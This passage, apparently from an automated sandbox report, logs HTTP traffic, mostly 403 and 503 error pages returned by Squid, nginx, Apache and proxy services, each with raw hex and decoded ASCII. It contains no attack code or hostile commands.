65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:09 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:11 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.22.1Date: Sat, 09 Mar 2024 12:15:12 GMTContent-Type: text/htmlContent-Length: 555Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable M
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:12 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 